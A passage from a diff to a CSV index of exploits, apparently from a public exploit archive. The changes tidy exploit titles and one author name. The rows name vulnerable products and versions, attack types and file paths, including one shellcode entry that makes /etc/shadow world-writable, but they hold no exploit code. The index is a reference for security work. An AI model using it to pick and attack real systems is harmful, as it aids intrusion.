Upload Vulnerability",2010-06-27,Mr.Benladen,php,webapps,0 14079,platforms/php/webapps/14079.txt,"i-netsolution Job Search Engine SQL Injection Vulnerability",2010-06-27,Sid3^effects,php,webapps,0 @@ -12604,7 +12604,7 @@ id,file,description,date,author,platform,type,port 14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple CSRF Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 14354,platforms/php/webapps/14354.txt,"AJ Article Persistent XSS Vulnerability",2010-07-13,Sid3^effects,php,webapps,0 14356,platforms/php/webapps/14356.txt,"CustomCMS Persistent XSS Vulnerability",2010-07-13,Sid3^effects,php,webapps,0 -14357,platforms/php/webapps/14357.txt,"2daybiz Businesscard Script Authentication bypass",2010-07-14,D4rk357,php,webapps,0 +14357,platforms/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication bypass",2010-07-14,D4rk357,php,webapps,0 14361,platforms/windows/local/14361.py,"Microsoft Excel 0x5D record Stack Overflow Vulnerability",2010-07-14,webDEViL,windows,local,0 14362,platforms/php/webapps/14362.txt,"CMSQLite - SQL Injection Vulnerability",2010-07-14,"High-Tech Bridge SA",php,webapps,0 14365,platforms/php/webapps/14365.txt,"Campsite CMS Remote Persistent XSS Vulnerability",2010-07-15,D4rk357,php,webapps,0 @@ -12692,7 +12692,7 @@ id,file,description,date,author,platform,type,port 14456,platforms/aix/remote/14456.c,"IBM AIX 5l FTPd Remote DES Hash Exploit",2010-07-24,kingcope,aix,remote,0 14457,platforms/php/webapps/14457.txt,"DM Filemanager 3.9.11 - Arbitrary File Upload Vulnerability",2010-07-24,eidelweiss,php,webapps,0 14458,platforms/php/webapps/14458.txt,"sNews (index.php) SQL Injection Vulnerability",2010-07-24,MajoR,php,webapps,0 -14459,platforms/php/webapps/14459.txt,"Open Realty 2.x and 3.x Persistent XSS Vulnerability",2010-07-24,K053,php,webapps,0 +14459,platforms/php/webapps/14459.txt,"Open Realty 2.x / 3.x - Persistent XSS Vulnerability",2010-07-24,K053,php,webapps,0 14461,platforms/asp/webapps/14461.txt,"AKY Blog SQL Injection Vulnerability",2010-07-24,v0calist,asp,webapps,0 14462,platforms/php/webapps/14462.txt,"Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability",2010-07-24,"ViRuS Qalaa",php,webapps,0 14463,platforms/php/webapps/14463.txt,"Joomla ITArmory Component (com_itarmory) SQL Injection Vulnerability",2010-07-24,Craw,php,webapps,0 @@ -12737,7 +12737,7 @@ id,file,description,date,author,platform,type,port 14518,platforms/php/webapps/14518.txt,"Joomla Component Spielothek 1.6.9 - Multiple Blind SQL Injection",2010-07-31,"Salvatore Fresta",php,webapps,0 14519,platforms/windows/remote/14519.html,"Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (IE6/IE7)",2010-07-31,Dr_IDE,windows,remote,0 14521,platforms/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass Vulnerability",2010-08-01,Magnefikko,hardware,webapps,0 -14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure and HTTP Authentication Bypass",2010-08-01,"Ben Schmidt",windows,remote,0 +14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass",2010-08-01,"Ben Schmidt",windows,remote,0 14523,platforms/php/webapps/14523.txt,"SnoGrafx (cat.php?cat) SQL Injection Vulnerability",2010-08-02,CoBRa_21,php,webapps,0 14528,platforms/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM modules.php SQL Injection Vulnerability",2010-08-02,secret,php,webapps,0 14530,platforms/php/webapps/14530.txt,"Joomla CamelcityDB 2.2 - SQL Injection Vulnerability",2010-08-02,Amine_92,php,webapps,0 @@ -12875,7 +12875,7 @@ id,file,description,date,author,platform,type,port 14706,platforms/windows/local/14706.py,"Microsoft Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0 14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 -14712,platforms/php/webapps/14712.txt,"4images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0 +14712,platforms/php/webapps/14712.txt,"4Images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0 14713,platforms/windows/dos/14713.py,"Abyssal Metal Player 2.0.9 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 14714,platforms/php/webapps/14714.txt,"Ananta Gazelle CMS - Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0 14716,platforms/php/webapps/14716.txt,"AneCMS /registre/next - SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 @@ -12999,7 +12999,7 @@ id,file,description,date,author,platform,type,port 14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 14882,platforms/windows/dos/14882.txt,"FFDshow - SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service Vulnerability",2010-09-03,"Matthew Bergin",windows,dos,0 -14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,R00t[ATI],php,webapps,0 +14884,platforms/php/webapps/14884.txt,"smbind <= 0.4.7 - SQL Injection Vulnerability",2010-09-03,r00t,php,webapps,0 14885,platforms/windows/remote/14885.html,"Trend Micro Internet Security 2010 - ActiveX Remote Exploit (UfPBCtrl.DLL)",2010-11-17,Dr_IDE,windows,remote,0 14887,platforms/php/webapps/14887.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2010-09-04,Abysssec,php,webapps,0 14890,platforms/php/webapps/14890.py,"mBlogger 1.0.04 (addcomment.php) Persistent XSS Exploit",2010-09-04,"Ptrace Security",php,webapps,0 @@ -13310,7 +13310,7 @@ id,file,description,date,author,platform,type,port 15293,platforms/linux/dos/15293.txt,"LibSMI smiGetNode Buffer Overflow When Long OID Is Given In Numerical Form",2010-10-20,"Core Security",linux,dos,0 15295,platforms/php/webapps/15295.html,"sNews CMS - Multiple XSS Vulnerabilities",2010-10-21,"High-Tech Bridge SA",php,webapps,0 15296,platforms/windows/remote/15296.txt,"Adobe Shockwave Player - rcsL chunk memory corruption (0day)",2010-10-21,Abysssec,windows,remote,0 -15297,platforms/windows/dos/15297.txt,"Windows Mobile 6.1 and 6.5 Double Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 +15297,platforms/windows/dos/15297.txt,"Windows Mobile 6.1 / 6.5 - Double Free Denial of Service",2010-10-21,"musashi karak0rsan",windows,dos,0 15298,platforms/multiple/remote/15298.txt,"Sawmill Enterprise < 8.1.7.3 - Multiple Vulnerabilities",2010-10-21,"SEC Consult",multiple,remote,0 15304,platforms/linux/local/15304.txt,"GNU C Library 2.x (libc6) - Dynamic Linker LD_AUDIT Arbitrary DSO Load Vulnerability (Local Root)",2010-10-22,"Tavis Ormandy",linux,local,0 15305,platforms/windows/dos/15305.pl,"RarmaRadio <= 2.53.1 - (.m3u) Denial of Service Vulnerability",2010-10-23,anT!-Tr0J4n,windows,dos,0 @@ -13627,7 +13627,7 @@ id,file,description,date,author,platform,type,port 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution Exploit",2010-12-06,Rew,windows,local,0 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player - (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0 -15699,platforms/php/webapps/15699.txt,"PhpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80 +15699,platforms/php/webapps/15699.txt,"phpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80 15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full Nelson' Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0 @@ -14069,7 +14069,7 @@ id,file,description,date,author,platform,type,port 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script SQL Injection Vulnerability",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 16266,platforms/php/webapps/16266.txt,"Quicktech SQL Injection Vulnerability",2011-03-02,eXeSoul,php,webapps,0 16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 -16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability",2011-03-02,DSecurity,php,webapps,0 +16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection Vulnerability",2011-03-02,DSecurity,php,webapps,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service Vulnerability",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0 16273,platforms/php/webapps/16273.php,"PHP Speedy <= 0.5.2 WordPress Plugin - (admin_container.php) Remote Code Execution Exploit",2011-03-04,mr_me,php,webapps,0 @@ -14485,7 +14485,7 @@ id,file,description,date,author,platform,type,port 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,metasploit,windows,remote,0 16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,metasploit,windows,local,0 16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use",2010-09-25,metasploit,windows,local,0 -16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow",2010-11-24,metasploit,windows,local,0 +16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - (PLS File) Stack Buffer Overflow",2010-11-24,metasploit,windows,local,0 16689,platforms/windows/remote/16689.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow",2010-04-30,metasploit,windows,remote,23 16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server URL Processing Overflow",2010-09-20,metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy Host Header Overflow",2010-07-12,metasploit,windows,remote,80 @@ -14707,7 +14707,7 @@ id,file,description,date,author,platform,type,port 16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,metasploit,linux,remote,0 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,metasploit,php,webapps,0 16912,platforms/php/webapps/16912.rb,"Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,metasploit,php,webapps,0 -16913,platforms/php/webapps/16913.rb,"PhpMyAdmin Config File Code Injection",2010-07-03,metasploit,php,webapps,0 +16913,platforms/php/webapps/16913.rb,"phpMyAdmin - Config File Code Injection",2010-07-03,metasploit,php,webapps,0 16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl Arbitrary Command Execution",2010-07-03,metasploit,cgi,webapps,0 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent Command Injection",2010-10-25,metasploit,linux,remote,0 16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution",2011-03-03,metasploit,linux,remote,0 @@ -14792,7 +14792,7 @@ id,file,description,date,author,platform,type,port 17001,platforms/windows/local/17001.pl,"CORE Multimedia Suite 2011 CORE Player 2.4 - Buffer Overflow (.m3u)",2011-03-18,Rh0,windows,local,0 17002,platforms/php/webapps/17002.txt,"CMS Loko Media - Local File Download Vulnerability",2011-03-18,Xr0b0t,php,webapps,0 17003,platforms/php/webapps/17003.py,"iCMS 1.1 - Admin SQLi/Bruteforce Exploit",2011-03-18,TecR0c,php,webapps,0 -17004,platforms/linux/dos/17004.txt,"(PHP 5.3.5) libzip 0.9.3 - _zip_name_locate NULL Pointer Dereference",2011-03-18,"Maksymilian Arciemowicz",linux,dos,0 +17004,platforms/linux/dos/17004.txt,"PHP 5.3.5 libzip 0.9.3 - _zip_name_locate NULL Pointer Dereference",2011-03-18,"Maksymilian Arciemowicz",linux,dos,0 17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 - Arbitrary Upload File Vulnerability (0day)",2011-03-19,Xr0b0t,php,webapps,0 17006,platforms/php/webapps/17006.txt,"balitbang CMS 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0 17007,platforms/php/webapps/17007.txt,"Phpbuddies - Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0 @@ -14839,7 +14839,7 @@ id,file,description,date,author,platform,type,port 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 17054,platforms/php/webapps/17054.txt,"webedition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution - Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 -17056,platforms/php/webapps/17056.txt,"WordPress plugin BackWPup - Remote and Local Code Execution Vulnerability",2011-03-28,"Sense of Security",php,webapps,0 +17056,platforms/php/webapps/17056.txt,"WordPress Plugin BackWPup - Remote and Local Code Execution Vulnerability",2011-03-28,"Sense of Security",php,webapps,0 17057,platforms/php/webapps/17057.txt,"webEdition CMS Local File Inclusion Vulnerability",2011-03-28,eidelweiss,php,webapps,0 17058,platforms/linux/remote/17058.rb,"Distributed Ruby Send instance_eval/syscall Code Execution",2011-03-27,metasploit,linux,remote,0 17061,platforms/php/webapps/17061.txt,"Andy's PHP Knowledgebase Project 0.95.4 - SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 @@ -14888,7 +14888,7 @@ id,file,description,date,author,platform,type,port 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH - sh4 - setuid(0) - chmod(_/etc/shadow__ 0666) - exit(0) (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection Exploit",2011-06-22,"Number 7",php,webapps,0 17110,platforms/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Stored XSS Vulnerabilities",2011-04-04,LiquidWorm,php,webapps,0 -17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) Stored and Reflective XSS Vulnerabilities",2011-04-04,"Michael Brooks",multiple,webapps,0 +17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Stored / Reflective XSS Vulnerabilities",2011-04-04,"Michael Brooks",multiple,webapps,0 17112,platforms/hardware/webapps/17112.txt,"Encore ENPS-2012 - Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17113,platforms/hardware/webapps/17113.txt,"TP-Link TL-PS110U & TL-PS110P Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17114,platforms/hardware/webapps/17114.txt,"Planex Mini-300PU & Mini100s Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 @@ -14968,7 +14968,7 @@ id,file,description,date,author,platform,type,port 17202,platforms/php/webapps/17202.txt,"Dolibarr ERP/CRM 3.0.0 - Multiple Vulnerabilities",2011-04-22,"AutoSec Tools",php,webapps,0 17203,platforms/php/webapps/17203.txt,"Web2Project 2.3 - SQL Injection Vulnerability",2011-04-22,"AutoSec Tools",php,webapps,0 17204,platforms/php/webapps/17204.txt,"DynMedia Pro Web CMS 4.0 - Local File Disclosure",2011-04-22,Mbah_Semar,php,webapps,0 -17205,platforms/php/webapps/17205.txt,"4images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 +17205,platforms/php/webapps/17205.txt,"4Images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injection Vulnerabilities",2011-04-22,^Xecuti0N3r,php,webapps,0 17207,platforms/php/webapps/17207.txt,"WordPress Plugin ajax category dropdown 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 @@ -15157,7 +15157,7 @@ id,file,description,date,author,platform,type,port 17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build <= 7801 - Directory Traversal Vulnerability",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 17444,platforms/php/webapps/17444.txt,"Webcat Multiple Blind SQL Injection Vulnerabilities",2011-06-23,w0rd,php,webapps,0 -17445,platforms/php/webapps/17445.txt,"2Point Solutions (cmspages.php) SQL Injection Vulnerability",2011-06-23,"Newbie Campuz",php,webapps,0 +17445,platforms/php/webapps/17445.txt,"2Point Solutions - (cmspages.php) SQL Injection Vulnerability",2011-06-23,"Newbie Campuz",php,webapps,0 17446,platforms/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion Vulnerability",2011-06-23,bd0rk,php,webapps,0 17449,platforms/windows/local/17449.py,"FreeAmp 2.0.7 - (.pls) Buffer Overflow Exploit",2011-06-24,"C4SS!0 G0M3S",windows,local,0 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",2011-06-25,metasploit,windows,remote,0 @@ -15218,7 +15218,7 @@ id,file,description,date,author,platform,type,port 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0 17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - (.ZIP) Heap Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow",2011-07-09,metasploit,windows,remote,0 -17514,platforms/php/webapps/17514.php,"phpMyAdmin 3.x Swekey Remote Code Injection Exploit",2011-07-09,Mango,php,webapps,0 +17514,platforms/php/webapps/17514.php,"phpMyAdmin 3.x - Swekey Remote Code Injection Exploit",2011-07-09,Mango,php,webapps,0 17515,platforms/php/webapps/17515.txt,"Portix-CMS 1.5.0. rc5 - Local File Inclusion Vulnerability",2011-07-09,Or4nG.M4N,php,webapps,0 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 - MiTM Attack",2011-07-09,Nibin,windows,remote,0 17518,platforms/php/webapps/17518.txt,"Tugux CMS 1.2 (pid) Arbitrary File Deletion Vulnerability",2011-07-10,LiquidWorm,php,webapps,0 @@ -15286,7 +15286,7 @@ id,file,description,date,author,platform,type,port 17595,platforms/php/webapps/17595.txt,"MyBB MyTabs (plugin) - SQL Injection Vulnerability (0day)",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC Credential Information Disclosure",2011-08-01,metasploit,jsp,webapps,0 17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL Injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 -17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow Vulnerability (DEP BYPASS)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 +17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - (.pls) Buffer Overflow Vulnerability (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server DoS",2011-08-03,"Craig Freyman",windows,dos,0 17602,platforms/php/webapps/17602.txt,"WordPress TimThumb Plugin 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0 17603,platforms/php/webapps/17603.txt,"Joomla Component (com_jdirectory) SQL Injection Vulnerability",2011-08-03,"Caddy Dz",php,webapps,0 @@ -15650,7 +15650,7 @@ id,file,description,date,author,platform,type,port 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0 18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0 18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread PoC",2011-10-22,pigtail23,windows,dos,0 -18020,platforms/php/webapps/18020.txt,"jara 1.6 - SQL Injection Vulnerability",2011-10-23,muuratsalo,php,webapps,0 +18020,platforms/php/webapps/18020.txt,"Jara 1.6 - SQL Injection Vulnerability",2011-10-23,muuratsalo,php,webapps,0 18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - DoS",2011-10-23,Alguien,php,dos,0 @@ -15770,7 +15770,7 @@ id,file,description,date,author,platform,type,port 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0day)",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,metasploit,multiple,remote,0 -18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 and 4300 Command Execution",2011-11-30,metasploit,hardware,remote,0 +18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,metasploit,hardware,remote,0 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability",2011-11-30,Silent_Dream,windows,dos,0 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit",2011-11-30,"Debasish Mandal",windows,local,0 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - afd.sys Local Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0 @@ -15788,7 +15788,7 @@ id,file,description,date,author,platform,type,port 18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal Vulnerability",2011-12-02,"SecPod Research",windows,remote,0 18190,platforms/windows/remote/18190.rb,"Serv-U FTP Server < 4.2 - Buffer Overflow",2011-12-02,metasploit,windows,remote,0 18192,platforms/php/webapps/18192.txt,"Joomla Jobprofile Component (com_jobprofile) - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 -18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 and 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 +18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC",2011-12-05,LiquidWorm,windows,dos,0 18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow (.m3u)",2011-12-03,metasploit,windows,local,0 18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow [ASLR Bypass]",2011-12-03,Zune,windows,dos,0 @@ -15968,7 +15968,7 @@ id,file,description,date,author,platform,type,port 18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0 18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,metasploit,windows,remote,0 18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 -18429,platforms/php/webapps/18429.pl,"4images 1.7.6-9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 +18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 SQLi Vulnerability",2012-01-30,"Craig Freyman",multiple,webapps,0 18431,platforms/multiple/webapps/18431.txt,"Ajax Upload Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 18432,platforms/php/webapps/18432.txt,"phux Download Manager Blind SQL Injection Vulnerability",2012-01-30,"Red Security TEAM",php,webapps,0 @@ -16025,7 +16025,7 @@ id,file,description,date,author,platform,type,port 18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Include Vulnerability",2012-02-17,Vulnerability-Lab,php,webapps,0 18495,platforms/php/webapps/18495.html,"almnzm 2.4 - CSRF Vulnerability (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 -18497,platforms/php/webapps/18497.txt,"4PSA CMS SQL Injection Vulnerabilities",2012-02-19,"BHG Security Center",php,webapps,0 +18497,platforms/php/webapps/18497.txt,"4PSA CMS - SQL Injection Vulnerabilities",2012-02-19,"BHG Security Center",php,webapps,0 18498,platforms/php/webapps/18498.html,"SyndeoCMS <= 3.0 - CSRF Vulnerability",2012-02-19,"Ivano Binetti",php,webapps,0 18500,platforms/windows/local/18500.py,"Blade API Monitor Unicode Bypass (Serial Number BOF)",2012-02-20,b33f,windows,local,0 18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - SEH Exploit (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 @@ -16436,7 +16436,7 @@ id,file,description,date,author,platform,type,port 19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 DEBUG Vulnerability",1988-08-01,anonymous,linux,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability",2012-06-10,"Easy Laster",php,webapps,0 -19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 +19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0 19036,platforms/php/webapps/19036.php,"WordPress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 @@ -16498,7 +16498,7 @@ id,file,description,date,author,platform,type,port 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure",2012-06-13,metasploit,hardware,remote,0 -19100,platforms/php/webapps/19100.rb,"WordPress plugin Foxypress uploadify.php - Arbitrary Code Execution",2012-06-13,metasploit,php,webapps,0 +19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress uploadify.php - Arbitrary Code Execution",2012-06-13,metasploit,php,webapps,0 19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow Vulnerability (1)",1998-08-31,"NAI research team",unix,remote,0 19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow Vulnerability 